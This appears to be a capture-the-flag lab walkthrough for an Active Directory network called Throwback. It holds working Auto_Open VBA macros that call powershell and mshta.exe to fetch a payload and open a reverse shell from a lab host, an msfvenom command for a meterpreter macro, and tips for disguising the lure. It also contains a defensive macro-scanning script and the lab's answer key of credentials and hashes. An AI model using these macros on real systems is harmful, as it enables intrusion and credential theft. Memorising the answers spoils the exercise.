It turns out, the answer is “Yes, (onto the) Next Question” and “Very easily”. To make a Macro execute on the document opening, we can add a useful “Sub” called “Auto_Open”. Upon document opening, whatever is in that Sub will be run; in this scenario, I'll call the HelloWorld Sub upon document opening with the code below.

Adding our malicious PowerShell code to the macro

Code Below:

    Sub HelloWorld()
        PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://192.168.125.1/passwd -OutFile C:\passwd", vbNormalFocus)
    End Sub

    Sub Auto_Open()
        HelloWorld
    End Sub

After saving this document as an xlsm (Excel Macro-Enabled Document) and upon reopening it, we should see a call out to our remote web server attempting to retrieve the file “passwd”.

Microsoft Excel Prompting the User to Accept Use of Macros

But what, what's this?

Microsoft has added a feature where the user must authorize Macros to be executed on the document to help protect the end-user. Fortunately, most people just don't care and will click “Enable Content” or have the “Allow All Macros” setting enabled by default.

After pressing “Display Content” we can see the request come into our web server as expected:

After Accepting Macros, the Macro Reaches Out to an HTTP Server

Creating a Malicious Macro

Now that you are more familiar with creating a Macro and utilizing the Auto_Open feature within Office Products, we can dive into creating and generating malicious Macros.

First, we will start off by manually creating a macro. We will be re-using the code from the previous section as our base, and we will also be utilizing Metasploit's HTA Server to gain a reverse shell.

To set up Metasploit's HTA Server for payload delivery you will need to use the module exploit/windows/misc/hta_server as seen in the screenshot below:

Starting Metasploit's HTA Server for Remote Payload Delivery

The URL containing the “Local IP” (In this case: https://192.168.100.128:8080/c94O6fz.hta) is the server that will deliver the payload to the unsuspecting victim. At the moment, we only have a URL that will deliver a payload, so how does this get executed on the machine?

Simply reaching out to the remote server won't cause the payload to fire, because it's not an executable (it's a .hta). We can use mshta.exe (a built-in executable on Windows devices that's used to aid in script execution with HTML applications) to execute the file on the remote server and return a shell. You can do this by calling mshta.exe followed by the URL of the payload delivery server, ex. https://192.168.100.128:8080/c94O6fz.hta, so the full command would look as follows.

mshta.exe https://192.168.100.128:8080/c9406fx.hta    

If we simply change our previous command in our “Hello World” Macro from Invoke-WebRequest to the command above (Remember, your IP address will be different), we will have a reverse shell returned.

The Updated Hello World Macro with mshta.exe being executed

Code Below:

    Sub HelloWorld()
        PID = Shell("mshta.exe https://192.168.100.128:8080/c9496fz.hta")
    End Sub

    Sub Auto_Open()
        HelloWorld
    End Sub

If we run the Macro now, we should see mshta.exe reach out to our payload server and successfully deliver the payload.

The Microsoft HTA Server Successfully Delivered The Payload, Landing a Shell
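From the detection side, the two ingredients that make both macros above work are an auto-run procedure (Auto_Open) and a call that hands control to the OS or fetches something remote (Shell, mshta.exe, powershell.exe with Invoke-WebRequest). Here is an added Python example (not from the room) that statically triages VBA source for both and follows bare calls out of the auto-run Sub. SAMPLE_MACRO is the room's second macro with the payload URL replaced by a placeholder; the indicator list is a small constructed set for the example, not an exhaustive ruleset.

```python
import re

# Constructed sample: the room's second macro with the hard-coded address
# replaced by a placeholder so the sample points nowhere.
SAMPLE_MACRO = """\
Sub HelloWorld()
    PID = Shell("mshta.exe https://ATTACKER_IP:8080/PLACEHOLDER.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub
"""

# Procedure names Office runs on open/close without any further user action
AUTO_EXEC = {"auto_open", "autoopen", "workbook_open", "document_open",
             "autoexec", "auto_close", "autoclose"}

# Tokens that hand control to the OS or fetch something remote (a small,
# constructed list for the example, not an exhaustive ruleset)
INDICATORS = [
    ("Shell()", re.compile(r"\bShell\s*\(", re.I)),
    ("WScript.Shell", re.compile(r"WScript\.Shell", re.I)),
    ("CreateObject()", re.compile(r"\bCreateObject\s*\(", re.I)),
    ("mshta.exe", re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("powershell", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("download", re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile", re.I)),
    ("URL", re.compile(r"https?://\S+", re.I)),
]

PROC_RE = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.I)
END_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
BARE_CALL_RE = re.compile(r"^\s*(\w+)\s*$")  # a line that is just a procedure name


def split_procs(source):
    """Map each procedure name to the lines of its body."""
    procs, current = {}, None
    for line in source.splitlines():
        m = PROC_RE.match(line)
        if m:
            current = m.group(1)
            procs[current] = []
        elif END_RE.match(line):
            current = None
        elif current is not None:
            procs[current].append(line)
    return procs


def scan_vba(source):
    """Static triage: which procedures auto-run, which procedures they reach
    through bare calls, and which indicators appear anywhere in the source."""
    procs = split_procs(source)
    canonical = {name.lower(): name for name in procs}
    auto = [name for name in procs if name.lower() in AUTO_EXEC]

    # Call graph built from lines that consist of just another procedure's name
    calls = {}
    for name, body in procs.items():
        calls[name] = [canonical[m.group(1).lower()] for m in map(BARE_CALL_RE.match, body)
                       if m and m.group(1).lower() in canonical]

    reachable, stack = set(), list(auto)
    while stack:
        name = stack.pop()
        if name not in reachable:
            reachable.add(name)
            stack.extend(calls.get(name, []))

    hits = [label for label, rx in INDICATORS if rx.search(source)]
    verdict = "suspicious" if auto and hits else "review" if hits else "clean"
    return {
        "procedures": list(procs),
        "auto_exec": auto,
        "reachable_from_auto_exec": sorted(reachable),
        "indicators": hits,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for key, value in scan_vba(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run over VBA source extracted from an .xlsm (oletools' olevba dumps it), this gives the same kind of verdict a mail gateway produces: an auto-run procedure plus an OS-execution indicator is what turns "macro present" into "block and alert", while a spreadsheet whose only macro is a Sub Total() with arithmetic comes back clean.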

Generating Macros with msfvenom

Alternatively, you can use msfvenom to create Malicious Macros, the syntax is much simpler, all you need to do is the following:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=53 -f vba -o macro.vba    

The above command will generate a Visual Basic Macro that will execute a reverse shell, your output will look something like so and will go directly into your Macro.

Utilizing MSFVenom to Generate a Malicious Macro

You will need to take the given Visual Basic macro from msfvenom and paste it into the Excel macro editor.

The Macro Pasted into Microsoft's Visual Basic Macro Editor.

Note: This is only an alternative to show theory behind malicious macros. There is Anti-Virus enabled on the box and we highly recommend that you take the HTA server route for creating a malicious macro.

Sending off the Malicious Macro

After setting up exploit/multi/handler to catch the Reverse Shell, we are ready to have the end-user open the Document.

Utilizing Metasploit's exploit/multi/handler to catch a Reverse Shell

Compromising the Target System with the use of Malicious Macros

Success, our payload successfully fired; the end-user has absolutely no knowledge that we have compromised their system. If you attempt to use this in the real world (with authorization, of course), it's ideal that you populate the spreadsheet with actual data. Opening up a spreadsheet/document with absolutely no data is a quick way to raise some alarms.

Finding an Attack Vector

Attempting to find an attack vector to successfully utilize malicious Macros may be difficult at first; the trick is asking yourself “Is a human going to read this?”. If you answer “Yes”, it's worth attempting this attack. You should be cautious when using this attack because you never know whose inbox it might end up in. The last thing you want is IT aware of your presence on the network.

Tasks

Entering the Breach

What is the domain name?

THROWBACK.local

What is the HTTP title of the web server running on THROWBACK-PROD?

Throwback Hacks

How many ports are open on THROWBACK-MAIL?

4

What service is running on THROWBACK-FW01?

pfsense

What version of Apache is running on THROWBACK-MAIL?

Apache/2.4.29

Exploring the Caverns

Who is the CEO of Throwback Hacks? 

Summers Winters

Where is the company located?

Great Britain

What is the guest username on the mail server?

tbhguest

What is the guest password on the mail server?

WelcomeTBH1!

Web Shells and You!

What username was used to access the configuration portal?

admin

What password was used to access the configuration portal?

pfsense

What menu tab contains a command prompt tab in the PFSense Configuration panel?

Diagnostics

First Contact

What log file was found that is not a default log?

login.log

What user was found within the log?

HumphreyW

What is the hash of the user?

1c13639dba96c7b53d26f7d00956a364

Wait, just you mean just one this time?

What is the username parameter in the POST request?

login_username

What is the password parameter in the POST request?

secretkey

What username found with hydra starts with an M?

MurphyF

What is the password found with hydra?

Summer2020

Gone Phishing

What User was compromised via Phishing?

BlaireJ

What Machine was compromised during Phishing?

THROWBACK-WS01

Just a Drop Will Do

What User fell victim to LLMNR Poisoning?

PetersJ

What is the 4th octet of the IP Address the LLMNR request came from?

219

What is the hostname of the device?

THROWBACK-PROD

We Will, We Will, Rockyou

What is the cracked password from the pfSense hash?

secuirtycenter

What is the cracked password from LLMNR poisoning?

Throwback317

Building Your Own Dark... er Deathstar

No answer needed; this task only requires setting up Starkiller and PowerShell Empire.

Deploy the Grunts!

We only need to create the listener and the stager with the proper IP and host, using windows/launcher_bat.

Get-Help Invoke-WorldDomination

In this task we only needed to host the backdoor on our local machine, transfer it to the target machine and execute it there.

SEATBELT CHECK!

What user was found from seatbelt?

admin-petersj

Dump It Like It's Hot

Understanding mimikatz post-exploitation tool

Not the soft and fluffy kind

What domain user was logged in?

BlaireJ

What is the user's hash?

c374ecb7c2ccac1df3a82bce4f80bb5b

What is the administrator's NTLM hash?

a06e58d15a2585235d18598788b8147a

Yo Dawg, I heard you like proxies.

No answer needed; this task is just about getting a meterpreter session, running autoroute and setting up a socks4 proxy.

Good Intentions, Courtesy of Microsoft

What two users could successfully pass the hash to THROWBACK-WS01? (In alphabetical order)

HumphreyW, BlaireJ

Wallace and Gromit

What service account is kerberoastable?

SQLSERVICE

What domain does the trust connect to?

CORPERATE.LOCAl

What normal user account is a domain admin?

MERCERH

With three heads you'd think they'd at least agree once

What account was compromised by kerberoasting?

SQLSERVICE

What password was cracked from the retrieved ticket?

mysql337570

You're Five Minutes Late...

What is the hostname of the device?

THROWBACK-TIME

What is the title of the web page?

Throwback Hacks Timekeep

What user was the password reset for?

murphyf

Word to your Mother

What web server accepts XLSMs as a file upload?

THROWBACK-TIME

What page is the file upload in?

timesheet.php

What is the name of the XLSMs that you can upload?

Timesheet.xlsm

Meterpreter session 1 closed. Reason: World-Domination

Which user's hashes were we able to dump?

Timekeeper

What is the user's hash starting from the third colon?

901682b1433fdf0b04ef42b13e343486

What is the administrator's hash starting from the third colon?

43d73c6a52e8626eabc5eb77148dca0b

What is the user's cracked password?

keeperoftime

We gotta drop the load!

What database are the timekeep login users located in?

timekeepusers

What database are the domain users located in?

domain_users

What table was located in the domain users database?

users

What is the first username in the table?

ClemonsD

So we're doing this again...

What user was successfully password sprayed?

JeffersD

What was the password for the user?

Throwback2020

SYNCHRONIZE

What user has dcsync rights?

backup

What user can we dump credentials for and is an administrator?

MercerH

This forest has trust issues

What domain has a trust relationship with THROWBACK.local?

CORPORATE.LOCAL

What is the hostname of the machine that has a forest trust with the domain controller?

CORP-DC01

What is the Administrator account we can use to access the second forest?

MercerH

What is the name of the file in the Administrator's Documents folder?

server_update.txt

r/badcode would like a word

What user has a GitHub account?

Rikka Foxx

What was the user found in GitHub?

DaviesJ

What password was found in GitHub?

Management2018

What machine can you access with the credentials?

CORP-ADT01

Identity Theft is not a Joke Jim

What file is in the Administrator's Documents folder?

email_update.txt

Who wrote the email?

Karen Dosier

What is her official title in the company?

Human Realtions Consulatant

Lost and Found

What is the email of the user who has been affected by the data breach?

SEC-JStewart@TBHSecurity.com

What was the user's password?

aqAwM53cW8AgRbfr

What credentials could be found in the Email?

Format: User:Pass

TBSEC_GUEST:WelcomeTBSEC1!